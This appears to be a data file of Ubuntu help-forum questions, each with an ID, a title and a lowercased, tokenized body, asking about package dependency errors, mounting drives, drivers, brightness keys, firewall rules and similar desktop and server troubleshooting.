4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . dpkg : error processing libqtgui4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-declarative : libqt4-declarative depends on libqt4-script ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-script on system is 4:4.8.1-0ubuntu4.4 . libqt4-declarative depends on libqt4-sql ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-sql on system is 4:4.8.1-0ubuntu4.4 . libqt4-declarative depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . libqt4-declarative depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-declarative ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-svg : libqt4-svg depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . libqt4-svg depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-svg ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-network : libqt4-network depends on libqt4-dbus ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqt4-dbus on system is 4:4.8.1-0ubuntu4.4 . libqt4-network depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . dpkg : error processing libqt4-network ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : libqt4-opengl depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . libqt4-opengl depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-xmlpatterns : libqt4-xmlpatterns depends on libqt4-network ( = 4:4.8.1-0ubuntu4.2 ) ; however : package libqt4-network is not configured yet . libqt4-xmlpatterns depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.2 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.4 . dpkg : error processing libqt4-xmlpatterns ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of checkbox-qt : checkbox-qt depends on libqtgui4 ; however : package libqtgui4 is not configured yet . dpkg : error processing checkbox-qt ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ubuntu-desktop : ubuntu-desktop depends on checkbox-qt ; however : package checkbox-qt is not configured yet . dpkg : error processing ubuntu-desktop ( -- configure ) : dependency problems - leaving unconfigured i absolutely have no idea what the above code means . remember i am completely a newbie to linux ubuntu . can i have a explanation in detail what this code means and how to fix this ?
378689	how to uninstall these parole plugins	i 'm using xubuntu and while playing a youtube video in parole it said 'parole needs text/html decoder to play this file ' ( i was pasting the link in parole ) i installed the asked plugins but still the video does n't played . i then checked its plugins but they were not there . i 'm in doubt if the plugins actually installed or not . they are also not appearing in software center . here is a screenshot of what i 've installed :
378692	fan speed due to cli at boot	i am having dell inspiron n5010 , today for the first time i pressed c at the time of choosing os , it enters into cli mode grub , then i just exited and booted normally , what exactly i felt after opening a drive that my cpu fan is running so fast as i have seen once while updating bios . and as i have installed cpu monitor indicator it was showing 100 % cpu usage .. now its fine after a reboot but i want to what causes this.so that i wont do any mistake next time.. and previously cpu normal temperature was around 36 and 38 now its not getting lower then 46 and 48 .
378694	unable to mount internal hard drive	i ca n't access my internal hard drives other than the root partition . when i open my hard drive , i get the following error message : error mounting /dev/sda5 at /media/sam/i stuffs : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/sam/i stuffs '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
378696	ubutnu 13.10 wo n't display	i recently installed ubuntu 13.10 on an older machine of mine which has an amd processor and amd graphics . when i attempt to boot it , i get a message saying to lower my monitor 's resolution . this message is shortly followed by a message saying that my graphics card , monitor , and input devices are not supported , what should i do ?
378697	how to install a .dmg controller in ubuntu ?	i 've heard that it is possible to use mac installers on ubuntu . is that true ? if it is , i 've got the controller as a .dmg file . how can i install this controller on ubuntu ? some context : i have a fuji xerox multifunctional printer that does n't have controllers for linux . i 've managed to get the printer working , but have n't been able to get the scanner working . i 've tried everything but no luck : ( i would really appreciate if somebody could help me , thanks in advance . ( please avoid obvious answers as `` just use simple scan and it 'll recognize it '' , i 've tried that )
378700	how can i get all usb storage device to mount as read-only or offer no mount options at all ?	these are the two parts of my query : is there a way to mount all usb storage/flash/removable storage devices as read-only i.e . set the default mount policy to read-only ? back in windows os , i could achieve write-protection for usb storage devices with some registry tweaks . how can i do that in ubuntu ? using dconf-editor i can control the automount , automount-open , autorun , ... ( schema : org.cinnamon.desktop.media-handling ) , but nautilus will always allow the devices to be mounted in a single click ! i do n't want that ! so can i control mount options that appear in nautilus under the devices menu of sidebar ? or is there a better way so that only the root is able to mount such devices ? i tried setting permissions in/to /dev/bus/usb with no luck at all .
378704	switching from unity to kde login screen problem	i switched from ubuntu to kubuntu today using apt-get install kubuntu-desktop , which worked fine except from the fact that the login screen that pops up when i boot up my computer is still the unity login screen . is there any way i can change it ? i 've been looking for a few hours now and i have no clue ... ( i 'm using 13.10 )
378708	how to speed bootup	i profiled my bootup using bootchart but i 'm not sure what to take out of it . my bootup time is 1:10 , is this a normal ( average ) time ? because i do n't think it is . can someone see something strange in the sequence ? would e4rat work better than ureadahead ? my hdd is mechanical
378709	vmware deletes my virtual machine after i restart my pc	after i created a backtrack virtual machine , whenever i restart my pc the virtual machine i created gets deleted
378712	gnomebaker not burning cd	i have downloaded gnomebaker after having a failure with the default programme for burning cds , but i could n't burn a cd with gnomwbaker because this dialog box pops up saying that i do n't have the plugin installed to handle a type audio/flac is n't installed . what plugin are they referring to and how do i install it ? thank you !
378714	why apt-get prompt me to run -f install and it can not be run properly ?	why apt-get prompt me to run -f install and it can not be run properly ? when i am trying to install some software through apt-get install xxx , it prompts me to run : you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies . libc6-dev : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is to be installed libc6-i386 : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.17-0ubuntu5 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . but when i run apt-get -f install , another error happens : ... dpkg : warning : files list file for package 'libkfile4 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'kollision ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libexempi3 : amd64 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'picmi ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'kdenetwork ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libgsl0-dev ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'xserver-xorg-input-vmmouse ' missing ; assuming package has no files currently installed ( reading database ... 8041 files and directories currently installed . ) preparing to replace libc6 : amd64 2.17-0ubuntu5 ( using ... /libc6_2.17-0ubuntu5.1_amd64.deb ) ... de-configuring libc6 : i386 ... a copy of the c library was found in an unexpected directory : '/lib/x86_64-linux-gnu/libc-2.17.so' it is not safe to upgrade the c library in this situation ; please remove that copy of the c library or get it out of '/lib/x86_64-linux-gnu ' and try again . dpkg : error processing /var/cache/apt/archives/libc6_2.17-0ubuntu5.1_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 no apport report written because maxreports has already been reached errors were encountered while processing : /var/cache/apt/archives/libc6_2.17-0ubuntu5.1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
378716	problem by access to ubuntu shared folder	i shared a folder in ubuntu and it installed samba service for make it work . then from another ubuntu system i can see that shared folder in network place . but when i want to open it , it asks me username , domain , password . i know the username and password . but it does n't accept it ? there is not any joined domain what should i put for domain ? i tried workgroup but nothing changed ! ! !
378721	move bios_grub partition to assign unallocated space	i have installed ubuntu 13.04 alongside osx and now i want to assign more space to the ubuntu partition . i booted from a live cd and used gparted but i encountered the following problem : between the unallocated space that i created and my ubuntu partition there is a 1mb partition flagged as bios_grub . i understand that i should move that partition to anoter place . so that it would be in the middle but when i click on it the move/resize option is grayed out . how can i fix this ? here is what i see from gparted :
378722	long waiting list for internet : what are these ip addresses ?	i am having a problem of slow internet browsing speed . when i checked it with nethogs there was a huge list waiting for internet . what are these ip addresses ? how can i find them ? is it due to a normal ubuntu process or abnormal process ?
378726	chromium ubuntu 13.10 - no webapp setup prompt no webapp icon	i have a completely fresh install for ubuntu 13.10 64-bit on dell latitude e6510 . ( i also had the same problem on the same laptop using 13.10 32-bit ) . i use chromium as my web browser . webapps are not working : chromium ubuntu 13.10 - no webapp setup prompt & webapp icons show up as chromium icon . already done are : sudo apt-get install unity-chromium-extension sudo apt-get install unity-webapps-* also in dconf /com/canonical/unity/webapps allowed-domains [ ] dontask-domains [ ] index-update-time 43200 integration-allowed ticked preauthorized-domains [ 'amazon.ca ' , 'amazon.cn ' , 'amazon.com ' , 'amazon.co.uk ' , 'amazon.de ' , 'amazon.es ' , 'amazon.fr ' , 'amazon.it ' , 'www.amazon.ca ' , 'www.amazon.cn ' , 'www.amazon.com ' , 'www.amazon.co.uk ' , 'www.amazon.de ' , 'www.amazon.es ' , 'www.amazon.fr ' , 'www.amazon.it ' , 'one.ubuntu.com ' ] online account enaled : google , facebook . there are two issues here : ( 1 ) no webapp setup prompts : case : upon opening of gmail , linkedin , launchpad , etc. , i expected to be prompted to enable the webapp but this did not happen . ( 2 ) webapp icons do not work . case : gmail does work . it was already there . no prompts or install procedures . however , whilst its icon is separate on the launcher , it is not a gmail icon but a chromium icon . how can i fix these issues ?
378728	codeblocks_data_dir environment variable	i had installed code : :blocks in ubuntu 12.04 and it was working jut fine until ~2 days ago when the program start to freezing out every ~10 sec . i decided to reinstall code : :blocks . first , i did : $ sudo apt-get remove codeblocks* $ sudo apt-get purge codeblocks* then i reinstall code : :blocks from ubuntu software center the reinstallation was successful , but now i get this error : can not find resources ... code : :blocks was configured to be installed in '/usr/local/share/codeblocks ' . please use the command-line switch ' -- prefix ' or set the codeblocks_data_dir environment variable to point where code : :blocks is installed , or try re-installing the application ... so , what i already did is to define the variable codeblocks_data_dir in .bashrc , such that when i do : $ echo $ codeblocks_data_dir i get /usr/share/codeblocks which is the director i believe it is the right directory , i also include export ld_library_path=/usr/lib/codeblocks : $ { ld_library_path } still , i still get the same error ( can not find resources ... ) so my questions are : 1 ) how do i find the `` correct '' codeblocks directory ? ( assuming that the one i wrote is not the right one ) 2 ) how do i fix the problem ? thanks ( everyone ) in advance , jorge
378733	black screen when fullscreening twitch	when i am watching a stream on twitch and activate fullscreen , the stream works properly in fullscreen . the issue occurs when i close fullscreen and try to open it again . the stream does n't fullscreen and then the smaller ( default ) sized video player turns black . the only solution that i have found is closing chrome and reopening it . i am using chrome 31 , gnome 3.11.2 , flash 11.2 and ubuntu 13.10
378734	how to configure apache to run php as fastcgi on ubuntu 12.04 via terminal ?	i 'm relatively new to the world of unix command line web server management/administration . many hosts with control panel administration options allow you to change how php is run with a simple option . the most common options being : apache module cgi application fastcgi application my question is simply , how do you change this via the command line ? i know there are many configuration files for apache . the closest thing i have found is this question , however the directory structure does not seem to match for my os ( ubuntu 12.04 ) . i 'm quite bewildered how there does not seem to be a clear guide that i can find that details this process for something that seems to be so common . forgive me if this exists ... if so , please point me in the right direction .
378735	ibus preferences is not shown in ubuntu 13.10	ibus preferences is not shown in ubuntu 13.10 , i already configured ibus to add new keyboard but it is not showing . ibus-setup command and it only shows next input method , there is not enable and disable option , how to fix this : )
378741	applications that open in fullscreen do n't exit correctly ?	so i 'm using kubuntu on my laptop . awhile back , i made compiz work with it via some tutorial online . but since then , whenever i open an application that starts in fullscreen mode , i have to resize the window in order to use the window 's exit/minimize/maximize buttons . otherwise , it clicks 'through ' those buttons , like if there 's an exit button for a different window right below the one i try to click , it 'll exit out the lower application . it even works correctly if i resize the window , then put it right back in to fullscreen . i 've looked online for others with this issue , and i 've looked through my compiz settings , but have n't found a solution to this problem . any ideas ?
378742	switching to right-to-left in 13.10	i ca n't seem to be able to switch to right-to-left which is critical for writing in hebrew . any idea on what i can do to fix it ?
378744	gear icon missing unity panel in ubuntu 13.04	i lost the gear icon in unity panel while trying to change icon themes . the icon appears in ubuntu-mono-light and in some added themes . i reinstalled ubuntu desktop and unity but no success . is it an installation issue ? is there any way to edit the panel to suit with icon size ?
378745	failed to complete installation upgrade	i was using ubuntu 13.04 and tried upgrading to 13.10 . it finished the downloading pretty well and was in the installation phase when power suddenly went off . now i have a partial installation in that some programs are not running and some graphics are just invincible . note : i do n't have a backup of my 13.04 . please help .
378747	netflix is sluggish when playing videos in hd .	i am using netflix desktop ( https : //launchpad.net/netflix-desktop ) which is basically just an application for ubuntu which uses firefox running in/under wine . everything works phenomenal , but the hd playback . i understand that wine slows down applications , but i am wondering what kinds of things i could do to possibly get more juice out of my ubuntu 12.04 . so far , i 've tried changing priority of the process in system monitor , but that does n't seem to work . my processor is intel® core™ i5-3317u cpu @ 1.70ghz × 4 i have 4 gb 's of ram ( and as much for swap ) my best guess is that i am not taking advantage of my video card which is intel hd graphics 4000 my computer is hp spectre xt 13-2050 ( http : //www.amazon.com/hp-spectre-13-2050nr-13-3-inch-laptop/dp/b0085ruzfa )
378748	why does online accounts on ubuntu lose the authorization so often ?	i was wondering how i have never had any similar problems with any android or web application that use similar methods of authorization to facebook , twitter or google . yet on askubuntu there is myriad of questions about online accounts needing re-authorizing on services and my own experiences just confirm this behavior . is this because buggy code in the online accounts itself or services not following api 's they have released ?
378750	notified brightness change is not applied	note : i know this question is becoming quite common , but i 'm afraid every solution i found failed to solve the problem . maybe the knowledge-base we have about this is getting old , irrelevant for newest hardware components ? my machine linux 3.8.0-33-generic # 48~precise1-ubuntu smp x86_64 x86_64 x86_64 gnu/linux i 'm running ubuntu 12.04 ( precise pangolin ) on a sony vaio , and the following amd graphic card : vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7550m/7570m/7650m ] most of the solutions i found where meant for nvidia graphics , which is why i 'm getting quite limited ... the problem basically , i ca n't change my brightness level . using the gui in settings , all settings , brightness and lock , i can `` change '' the brightness value , but nothing actually happens . using the fn + f5/f6 keys triggers a desktop notification displaying the new brightness value , but still : nothing changes . what i 've tried it 's important to know that this problem has n't been there forever . on my first ubuntu install , everything was quite functional when it comes to brightness . then , because i got quite bored of ubuntu , i decided to switch to arch linux , and i 'm now back on ubuntu for my primary desktop machine . however now , setting the brightness is not possible anymore , which means i have to use my screen at full brightness everytime , even when i 'm on battery ... as i said , i tried as many solutions as i was able to find : i edited the grub_cmdline_linux grub setting , with acpi_osi=linux . files were created into /sys/class/backlight/acpi_video0 ( actual_brightness , brightness and max_brightness ) , but even though their content changes as i set my brightness higher or lower , no change is effective . same thing , adding acpi_backlight=vendor . the /sys/class/backlight/acpi_video0 link/directory disappeared . control keys do not trigger notifications anymore , and changing the setting using the gui is no longer possible . i tried using xbacklight . no error , but no changes . has anyone got any experience with those problems ? problem solved ! here 's the workaround i 've made from s prasanth 's answer . root terminal required . in a /usr/bin/brightness_change file , i 've placed this script : # ! /bin/bash if [ $ # -ne 1 ] ; then echo `` usage : brightness_change [ level ] '' > /dev/stderr exit 1 fi if [ ! -w /sys/class/backlight/acpi_video0/brightness ] ; then echo `` brightness settings are not available . '' > /dev/stderr exit 2 fi timeout=4 endtime= $ ( ( $ ( date + % s ) + $ timeout ) ) while [ $ ( date + % s ) -lt $ endtime ] do echo $ 1 | tee -a /sys/class/backlight/acpi_video0/brightness > /dev/null 2 > /dev/null done this script will not always give a satisfying result . it usually has to be run several times before succeeding . also , remember to set its rights and ownership correctly : chown root : root /usr/bin/brightness_change chmod 0755 /usr/bin/brightness_change now , in my /etc/sudoers file : all all=nopasswd : /usr/bin/brightness_change this way , anyone can execute sudo brightness_change without the need of a password . for further improvements : you may want to connect this script to your acpi events , in order to trigger a brightness change when your laptop goes on battery , on gets plugged-in . note : this problem seems to have been fixed in the newest versions of the driver , my hotkeys are now fully functional .
378757	keyboard stop working after grub	my keyboard works fine in bios , it even works when i enter grub which unetbootin created . after i select install , and i 'm presented with language options for installation , keyboard stops working . every in installation results in led blink on keyboard , nothing else . i have to mention i 'm installing ubuntu server 13.10 64bit . my computer do n't have ps2 slot so i ca n't try it with ps2 keyboard . i also tried another keyboard - > same result . what can i do to fix it ?
378762	rename nautilus sidebar shortcut to home directory	how can i rename the sidebar shortcut to my home directory ? i changed the language from english to german . the name of the shortcut is `` persรถnlicher ordner '' ( personal folder ) and i want to rename it to show my user name . i figured out a way to edit all the other shortcuts by edit ~/.config/user-dirs.dirs but there is not an entry for the home directory , only for its sub folders .
378765	upgrade to ubuntu 12.04 lts server	i have ubuntu 11.10 server , i want to upgrade it to 12.04lts but the update manager show that the new release is 12.04.03lts , how can i get 12.04lts ?
378768	create ubuntu version that refreshes after each restart	this is my first time posting on this forum so i hope what i am asking for makes sense . on weekends i admin the computers in a small learning center in my city where underprivileged kids can come and use the computers for homework , research or to play learning games . what i want to do is install ubuntu on each of the pcs and customise it by adding the necessary drivers and 3rd party apps ( such as chrome and steam ) , and then create a snapshot of the os in this initial state and boot from the snapshot each time the computer is restarted . the reason i want to do this is to make sure that even if the previous user tampered with the pc , the next user will always get a clean , unchanged system to work on . it will also prevent people using each others online profiles ( such as facebook or gmail ) by accident if the previous user forgot to log off , and whipe any content the previous user might have downloaded . does anyone have a link to a tutorial or know of how to setup a scenario like the one i described ? i am pretty technically competent , just new to ubuntu : - ) thanks in advance for your help ! update : it looks like using the guest account solves 80 % of the problems i have , and then using a script at startup should do the rest . thanks everyone for your quick responses : it looks like you have an awesome community going on here : - )
378769	gnome shell installation problems in ubuntu 13.10	i have installed ubuntu 13.10 and installed gnome shell for looks.. for complete gnome experience i removed ubuntu settings using terminal and then installed gnome shell and restarted.. now my display is showing a black screen with crossed cursor.. i thought to format my system but i have installed too many packages and i do n't want to lose them . what should i do ? please help , thanks in advance .
378774	swift - no ring is created when deployed using juju	here is the output of swift-init start main on swift-proxy node ubuntu @ fxhhr : ~ $ sudo swift-init -n start main starting proxy-server ... ( /etc/swift/proxy-server.conf ) unable to locate config for container-server unable to locate config for account-server unable to locate config for object-server traceback ( most recent call last ) : file `` /usr/bin/swift-proxy-server '' , line 22 , in < module > run_wsgi ( conf_file , 'proxy-server ' , default_port=8080 , **options ) file `` /usr/lib/python2.7/dist-packages/swift/common/wsgi.py '' , line 122 , in run_wsgi loadapp ( 'config : % s ' % conf_file , global_conf= { 'log_name ' : log_name } ) file `` /usr/lib/python2.7/dist-packages/paste/deploy/loadwsgi.py '' , line 247 , in loadapp return loadobj ( app , uri , name=name , **kw ) file `` /usr/lib/python2.7/dist-packages/paste/deploy/loadwsgi.py '' , line 272 , in loadobj return context.create ( ) file `` /usr/lib/python2.7/dist-packages/paste/deploy/loadwsgi.py '' , line 710 , in create return self.object_type.invoke ( self ) file `` /usr/lib/python2.7/dist-packages/paste/deploy/loadwsgi.py '' , line 203 , in invoke app = context.app_context.create ( ) file `` /usr/lib/python2.7/dist-packages/paste/deploy/loadwsgi.py '' , line 710 , in create return self.object_type.invoke ( self ) file `` /usr/lib/python2.7/dist-packages/paste/deploy/loadwsgi.py '' , line 146 , in invoke return fix_call ( context.object , context.global_conf , **context.local_conf ) file `` /usr/lib/python2.7/dist-packages/paste/deploy/util.py '' , line 56 , in fix_call val = callable ( *args , **kw ) file `` /usr/lib/python2.7/dist-packages/swift/proxy/server.py '' , line 1949 , in app_factory return application ( conf ) file `` /usr/lib/python2.7/dist-packages/swift/proxy/server.py '' , line 1749 , in __init__ ring ( os.path.join ( swift_dir , 'object.ring.gz ' ) ) file `` /usr/lib/python2.7/dist-packages/swift/common/ring/ring.py '' , line 51 , in __init__ self._reload ( force=true ) file `` /usr/lib/python2.7/dist-packages/swift/common/ring/ring.py '' , line 56 , in _reload ring_data = pickle.load ( gzipfile ( self.pickle_gz_path , 'rb ' ) ) file `` /usr/lib/python2.7/gzip.py '' , line 89 , in __init__ fileobj = self.myfileobj = __builtin__.open ( filename , mode or 'rb ' ) ioerror : [ errno 2 ] no such file or directory : '/etc/swift/object.ring.gz'
378775	how do i fix noise music player on ubuntu 13.04 ?	i 'm using a really nice music player from elementary os called noise , which i installed on my ubuntu raring 13.04 install by adding the elementary-os/stable ppa ( the entry is deb http : //ppa.launchpad.net/elementary-os/stable/ubuntu precise main ) and installing the noise package . it worked completely for a while , but now when i start it , the ui will be responsive for a second and then immediately become unresponsive . however i know it is still working as if i start it with a song as a parameter it will play in the background while the ui is frozen . how can i fix this ?
378776	unable to include libv8 in a c++ app	i was trying to use the libv8-3.8.9.20 package in my c++ script . the package is installed in /usr/lib/ as supposed but if i try to compile my script using g++ script.cpp -iv8 command , nothing happens . what should be in the script 's header so i could use the library ? this is what i 've tried : # include < v8 > # include < libv8 > # include < libv8.so > # include < v8.so > on the next line was using namespace v8 command . when i do this , g++ returns an error : index.cpp:1:20 : fatal error : libv8.so : no such file or directory # include < libv8.so > ^ compilation terminated . or something like that . i have even tried to compile it without the header but g++ did n't like it . is it possible to use the library this way ? and how ? thank you , m93a edit : after installing libv8-dev ( or libv8-3.14-dev , i 've tried both ) compiler throws : index.cpp : in function ‘int main ( int , char** ) ’ : index.cpp:10:35 : error : no matching function for call to ‘v8 : :handlescope : :handlescope ( v8 : :isolate* & ) ’ handlescope handle_scope ( isolate ) ; ^ index.cpp:10:35 : note : candidates are : in file included from index.cpp:1:0 : /usr/include/v8.h:473:3 : note : v8 : :handlescope : :handlescope ( const v8 : :handlescope & ) handlescope ( const handlescope & ) ; ^ and so on ... ( it 's too long and still saying something 's not found ) i 'm using g++ main.cpp -lv8 command .
378778	unable to launch skype in ubuntu 13.10 64bit - symbol lookup error	i installed skype from the ubuntu software centre . i tried to launch it using the dash . it did n't work . so , when i try to launch skype from the terminal , it throws the following error : skype : symbol lookup error : skype : undefined symbol : _zn19qabstractproxymodel11setitemdataerk11qmodelindexrk4qmapii8qvariante how can i fix this ?
378779	dell inspiron 5521 drivers for ubuntu	how to install all drivers for dell inspiron 5521 for ubuntu ? the laptop came with ubuntu pre-installed so there must be drivers somewhere on internet . i have searched but did n't get any . also i am new for ubuntu . here is the link for components in dell inspiron 5512 : http : //www.ubuntu.com/certification/hardware/201208-11540/components/ thanks a lot .
378780	allow outgoing connections only to specific domain/ip	i 'm trying to allow connection to only one website ( for only one domain ) . for example www.mywebsite.com , with ip address a.b.c.d . my iptables definition looks like this : iptables -i input 1 -i lo -j accept iptables -a output -p udp -- dport 53 -j accept iptables -a output -p tcp -d a.b.c.d -- dport 80 -j accept iptables -a input -m conntrack -- ctstate established , related -j accept iptables -p input drop iptables -p output drop problem is that it looks like subfolder of that website is not on the same server . so if it 's on www.mywebsite.com , user must be able to access also to www.mywebsite.com/cobiss/ , www.mywebsite.com/cobiss ? param1=value1 & param2=value2 . can you help me what additional rules i need to allow access to related parts of that site ?
378782	xubuntu 13.10 screen brightness fn keys	i have a samsung series 9 np900x3c , which has a intel hd graphics 4000 chip . when i use the the fn keys for changing the brightness , it shows me a nice osd and sets the value in /sys/class/backlight/samsung/brightness however , this does n't do anything to the actual screen . instead , i have to echo $ number > > /sys/class/backlight/intel_backlight/brightness how do i fix this keybinding ? the same goes for the keyboard illumination , i 've found the place in /sys/call/leds/ to set it , but the fn key combination does diddley-squat .
378785	how to install apple theme offline on ubuntu ?	my friends likes to convert ubuntu theme to apple theme . but due to lack of internet connectivity he ca n't install apple theme using terminal ( through commanding ) . is there a way to back up my theme and give him a copy ?
378786	what does ` ! ! ` mean in `sudo ! ! ` ?	i am a user of ubuntu with not much experience and i have been using sudo . what does sudo ! ! do and how ?
378787	how to display my name and the icon menu on ubuntu 13.10 ?	how to display my username or my real name and the icon menu on ubuntu 13.10 ?
378789	power failure during formatting pendrive : does not showing the device	during formatting ( sandisk ) pendrive ( of 16gb ) there was power failure . after that i could find my the device ( pendrive ) . i am using linux 12.04 lts 32-bit .
378790	unable set zte mf-195 usb wireless 3g modem	i posted the similar question the other day and have managed to get ubuntu recognizes my usb modem . so i used sakis3g and somehow managed to get my modem appear in network connections but it is gray and i can not click on it or anything . what could be the problem ? is there anything else i need to set ?
378800	xubuntu 13.10 volume panel item always shows `` muted ''	when i use the fn keys for volume ( up , down , mute ) , i get a nice notification of the current volume , and everything works . however , the panel item for volume , between battery and network , always shows the sound as muted . ( loudspeaker with two dashes . ) when i click onto it , i do n't get a volume slider , either . what 's the matter here ?
378804	automysqlbackup - how to store username / password	i 'm trying to setup automysqlbackup on ubuntu 12.04.3 lts in security conscious manner . i 've setup a mysql user with minimum privileges for backups . but when installing automysqlbackup from apt-get i 've noticed that by default there is : username=grep user /etc/mysql/debian.cnf | tail -n 1 | cut -d '' = '' -f2 | awk ' { print $ 1 } ' which is grabbing the default user : `` debian-sys-maint '' if i chose to user my new user , then it would mean storing the username and password unencrypted in the automysqlbackup file which also seems accessible without doing sudo . and the debian.cnf says : automatically generated for debian scripts . do not touch ! what is the best option to securely configuring automysqlbackup ? i was n't sure if to ask this on stackexchange sister sites ( it security , dba ) , but i think i 'm after specific security advice on ubuntu .
378806	kerberos is n't allow existing users login on some machine	in my place , there are more than 40 computers in the office and using kerberos as authentication . the issue occurs in about 4 computers in the office . i know not much about kerberos system but i think the root cause must from kerberos . below is the symptom of the issue . all user account ca n't login those machines with kerberos account local account of machine is `` logable '' . i 'm not sure what 's the root cause of the problem . is it possible that kerberos block some machine because of some reason ? what troubleshooting need to be done or what is the root cause of this problem ?
378809	how to install networkdriver ?	i want to use eth0 driver , but my network card is unclaimed . i use killer e2200 gigabit ethernet controller . how to install the networkdriver ? and how to use eth0 ?
378811	can i switch shells on ubuntu touch ?	as far as i know ; ubuntu touch uses bits and parts of android 's open implementation to handle the parts necessary to work on the nexus 4 and other devices . i 'm completely shooting in the dark ; but how probable would it be for that operating system to run/use a separate desktop environment for the device .
378813	change dolphin mouse hover highlight behaviour	i 'm using kubuntu 13.10 . when i hover the mouse cursor over a file entry in dolphin , the entry is highlighted . my problem is , that the highlight is faded in , so it takes around half a second until the highlight is fully visible . how do i configure dolphin so the highlight is fully visible at once , and no longer faded in ?
378814	error `` 503 out of disk space '' when installing a package	possible answer unable to play mp3/mp4 in rhythmbox/movie player rhythmbox is unable to found mpeg mp3 plugin though vlc is able to play mp3 files . i tried to install ubutnu-restricted-extras but it gives the following error err http : //archive.ubuntu.com/ubuntu/ saucy-updates/universe libavcodec-extra-53 amd64 6:0.8.9ubuntu0.13.10.1 503 out of disk space err http : //archive.ubuntu.com/ubuntu/ saucy-security/universe libavcodec-extra-53 amd64 6:0.8.9ubuntu0.13.10.1 503 out of disk space failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/liba/libav-extra/libavcodec-extra-53_0.8.9ubuntu0.13.10.1_amd64.deb 503 out of disk space the problem persist . edit : to be clear my root has 450 gb space unused . *df -*h gives : /dev/sda1 455g 4.3g 428g 1 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.9g 12k 1.9g 1 % /dev tmpfs 382m 1.2m 381m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 184k 1.9g 1 % /run/shm none 100m 60k 100m 1 % /run/user moreover i have found that the home folder ( /home/aul ) is full but i do n't have a clue why.please have a look at the screen shots and help if you can figure it out have a look at the link for the image : https : //drive.google.com/file/d/0bzldmce2arllanrymhzurvnvdhm/edit ? usp=sharing since i have space left what should be done to avoid this in future ? do i have to create a new partition ? i have recently format it so i do n't have any issue reformatting it.what should i keep in mind while reformating ?
378818	problem with workspace switching	in ubuntu 13.04 , to move an application from one workspace to other , ctrl+shift+alt+ the side of switching used to work . now , i can use ctrl+shift+alt+- > and ctrl+shift+alt+ < - work , but ctrl+shift+alt+down and ctrl+shift+alt+up do n't work . ctrl , shift , alt , all arrow buttons work individually . any possible cause of this malfunction ? edit1 : i indeed have 4 work spaces , although i can not shift programs to them , i can use them normally . os : ubuntu 13.10
